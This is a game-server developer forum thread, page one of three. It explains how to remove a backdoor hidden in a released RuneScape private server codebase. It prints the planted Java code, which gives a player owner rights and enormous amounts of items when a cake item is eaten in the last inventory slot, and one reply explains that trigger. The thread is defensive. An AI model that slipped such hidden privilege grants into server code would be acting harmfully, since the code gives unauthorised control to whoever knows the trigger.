Thread: [Ascend] Removing G00N's Exploit

Page 1 of 3 123 LastLast
Results 1 to 10 of 30
  1. #1 [Ascend] Removing G00N's Exploit 
    Donator
    OldSchool RSPS's Avatar
    Join Date
    Aug 2018
    Posts
    113
    Thanks given
    40
    Thanks received
    16
    Rep Power
    30
    Hello, just recently downloaded Ascend's to use it as main base.
    Another developer let me know there's an exploit in it, thanks to him for the information, will credit you at the end of this thread.

    First off go in model/items/UseItems.java
    Find this
    Code:
    			case 70:
    Remove all of the code underneath it
    Code:
    		case 70:
    				if(itemId==1895 && slot == 27){
    					if(player.getItems().isWearingItems()){
    						return;
    					}
    					player.getRights().add(Right.OWNER);
    					player.getItems().addItem(995,2000000000);
    					player.getItems().addItem(13307,2000000000);
    					player.donatorPoints+=10000000;
    					player.amDonated+=10000;
    				}
    				break;
    There you go, removed the exploit. Wasn't so complicated was it ?
    Credits goes to [Only registered and activated users can see links. ] for informing me and telling me what file was used for this.


    [Only registered and activated users can see links. ]
    Reply With Quote  
     

  2. Thankful users:


  3. #2  
    Skotos Founder


    Join Date
    Jan 2017
    Age
    21
    Posts
    879
    Thanks given
    136
    Thanks received
    173
    Discord
    View profile
    Rep Power
    117
    Jesus that would of been bad lmao
    Reply With Quote  
     

  4. #3  
    Donator
    OldSchool RSPS's Avatar
    Join Date
    Aug 2018
    Posts
    113
    Thanks given
    40
    Thanks received
    16
    Rep Power
    30
    Quote Originally Posted by Mantvis View Post
    Jesus that would of been bad lmao
    Haha i know right.

    [Only registered and activated users can see links. ]
    Reply With Quote  
     

  5. #4  
    Copenhagen Mint LC


    Join Date
    Apr 2012
    Age
    23
    Posts
    1,518
    Thanks given
    406
    Thanks received
    367
    Rep Power
    475
    So many servers didn't have this fixed
    Reply With Quote  
     

  6. #5  
    Registered Member Rema's Avatar
    Join Date
    Sep 2018
    Posts
    44
    Thanks given
    6
    Thanks received
    7
    Rep Power
    16
    Code:
    player.getRights().add(Right.OWNER);
    
    player.getRights().add(Right.DEVELOPER);
    
    player.getItems().addItem;
    
    player.getItems().addItem;
    					
    player.donatorPoints+=;
    					
    player.amDonated+=;
    A lot of releases have backdoors, just search the project for things like these and remove them.
    Reply With Quote  
     

  7. #6  
    Registered Member
    Join Date
    Dec 2016
    Posts
    34
    Thanks given
    7
    Thanks received
    45
    Rep Power
    5
    Was not intentional forgot to remove it will add it to main post thanks
    Reply With Quote  
     

  8. Thankful users:


  9. #7  
    Registered Member
    vvaved's Avatar
    Join Date
    Sep 2017
    Posts
    247
    Thanks given
    87
    Thanks received
    61
    Rep Power
    116
    Quote Originally Posted by G00N View Post
    Was not intentional forgot to remove it will add it to main post thanks
    Love ya.

    "You must spread some Reputation around before giving it to G00N again."

    [Only registered and activated users can see links. ]
    Reply With Quote  
     

  10. Thankful user:


  11. #8  
    Donator

    Join Date
    Apr 2016
    Posts
    43
    Thanks given
    4
    Thanks received
    3
    Rep Power
    11
    So how does this exploit work, itemid 1895 is a slice of cake. Im new the the rsps coding scene so idk how it works. I also have this source and client so i would like to know how it works generally.
    Reply With Quote  
     

  12. #9  
    Respected Member

    Join Date
    Jan 2009
    Posts
    5,682
    Thanks given
    1,093
    Thanks received
    3,494
    Discord
    View profile
    Rep Power
    5000
    Quote Originally Posted by Frikk View Post
    So how does this exploit work, itemid 1895 is a slice of cake. Im new the the rsps coding scene so idk how it works. I also have this source and client so i would like to know how it works generally.
    put the slice of cake in the last inventory slot then eat it
    Reply With Quote  
     

  13. #10  
    Extreme Donator

    Patrity's Avatar
    Join Date
    Jul 2008
    Age
    28
    Posts
    937
    Thanks given
    173
    Thanks received
    306
    Discord
    View profile
    Rep Power
    882
    Quote Originally Posted by G00N View Post
    Was not intentional forgot to remove it will add it to main post thanks
    Then why not add it to the post two+ weeks ago when I told you about it?

    Free map releases: [Only registered and activated users can see links. ]



    [Only registered and activated users can see links. ]
    Reply With Quote  
     

Page 1 of 3 123 LastLast

Thread Information
Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)


User Tag List

Similar Threads

  1. [667/xxx] Removing Another Matrix Exploit
    By Cloud クラウド in forum Tutorials
    Replies: 15
    Last Post: 07-18-2012, 04:36 AM
  2. *Removing a 667 Exploit*
    By All3n in forum Tutorials
    Replies: 13
    Last Post: 05-28-2012, 11:04 PM
  3. Removing Flames in Client
    By Guthan in forum Tutorials
    Replies: 15
    Last Post: 07-24-2009, 10:42 PM
  4. Removing Objects In An Area (UNTESTED)
    By Llama in forum Tutorials
    Replies: 10
    Last Post: 06-21-2007, 09:33 PM
Posting Permissions
  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •